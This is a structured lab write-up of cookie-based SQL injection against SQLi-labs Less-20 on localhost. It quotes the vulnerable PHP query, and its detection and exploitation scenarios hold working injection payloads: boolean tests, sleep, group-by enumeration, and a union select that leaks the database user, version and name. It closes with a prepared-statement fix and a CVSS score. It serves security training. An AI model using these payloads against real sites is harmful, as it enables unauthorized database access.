## Version 2.0
## language: en

Feature: SQL Injection Level 20
  TOE:
    SQLI-labs
  Category:
    SQL Injection -  POST-Cookie-Injection-Error-Based
  Location:
    http://localhost/sqlilabs/Less-20/ - id (field)
  CWE:
    CWE-89: SQL Injection
      https://cwe.mitre.org/data/definitions/89.html
  Rule:
    REQ.173 Discard unsafe inputs
      https://fluidattacks.com/web/rules/173/
  Goal:
    Check the website vulnerability against SQL Injection
  Recommendation:
    Use prepared Statements

  Background:
  Hacker's software:
    | <Software name> | <Version>     |
    | Windows OS      | 10            |
    | Chrome          | 80.0.3987.100 |
  TOE information:
    Given I am accessing to the website
    And the server is running MySQL version 5.7.28
    And PHP version 5.6.40
    And is running on localhost

  Scenario: Normal use case
    Given I am on the main page
    And I can see a form with "Username" and "Password"
    When I fill the "Username" with "admin" and the "Password" with "admin"
    Then A new message appears
    """
    YOUR USER AGENT IS : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36
    YOUR IP ADDRESS IS : ::1
    DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE
    YOUR COOKIE : uname = admin and expires: Tue 25 Feb 2020 - 21:11:29
    Your Login name:admin
    Your Password:admin
    Your ID:8
    """
    And A button appears to delete the cookies

  Scenario: Static detection
    Given I access to the source code
    When I look for the related code
    Then I find the related query
    """
    $cookee = $_COOKIE['uname'];
    $sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
    $result=mysql_query($sql);
    """
    When I analyze the code
    Then The "cookee" parameter is not checked
    And The query is vulnerable to SQL injection

  Scenario: Dynamic detection
    Given The website charge a cookie called "uname"
    And The "uname" cookie has the value of admin
    When I inject the code as the "uname" value
    """
    admin' and 1=1 #
    """
    Then I can see the message
    """
    YOUR USER AGENT IS : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36
    YOUR IP ADDRESS IS : ::1
    DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE
    YOUR COOKIE : uname = admin and expires: Tue 25 Feb 2020 - 21:11:29
    Your Login name:admin
    Your Password:admin
    Your ID:8
    """
    When I inject the code as the "uname" value
    """
    admin' and 2=1 #
    """
    Then I can see a new message
    """
    BUG OFF YOU SILLY DUMB HACKER
    """
    When I inject the code as the "uname" value
    """
    admin' and sleep(10) #
    """
    Then The website keeps refreshing for a short time
    When I inject the value into "uname"
    """
    admin'  group by 1,2,3,4 #
    """
    Then I can see an error message
    """
    Issue with your mysql: Unknown column '4' in 'group statement'
    """
    When I inject the value into "uname"
    """
    admin'  group by 1,2,3 #
    """
    Then I do not see an error message
    And The query is vulnerable to SQL injection

  Scenario: Exploitation
    Given The web site is vulnerable
    When I inject the value into "uname"
    """
    admin'  union select user(), version(), database()  limit 0, 1 #
    """
    Then I can see the message
    """
    Your Login name:admin
    Your Password:admin
    Your ID:8
    """
    When I inject the value into "uname"
    """
    admin'  union select user(), version(), database()  limit 1, 1 #
    """
    Then I can see the message [evidence](evidence.png)
    """
    Your Login name:5.7.28
    Your Password:security
    Your ID:root@localhost
    """
    And The website is vulnerable to SQL injection

  Scenario: Remediation
    Given The web site is vulnerable against SQL injection
    And The code does not have prepared statements
    When The web site is using the vulnerable query
    Then The code must be replaced with
    """
    $stmt = $mysqli->prepare("SELECT * FROM users WHERE username=? LIMIT 0,1");
    $stmt->bind_param("s", $cookee);
    $stmt->execute();
    $stmt->close();
    """
    And The query could be shielded against SQL injection

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      6.5/10 (Medium) - AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    Temporal: Attributes that measure the exploit's popularity and fixability
      6.2/10 (Medium) - E:H/RL:O/RC:C
    Environmental: Unique and relevant attributes to a specific user environment
      4.5/10 (Medium) - CR:L/IR:L/AR:L/MAV:N/MAC:L/MPR:L/MUI:N/MS:U/MC:H/MI:N/MA:N

  Scenario: Correlations
    No correlations have been found to this date 2020-02-25
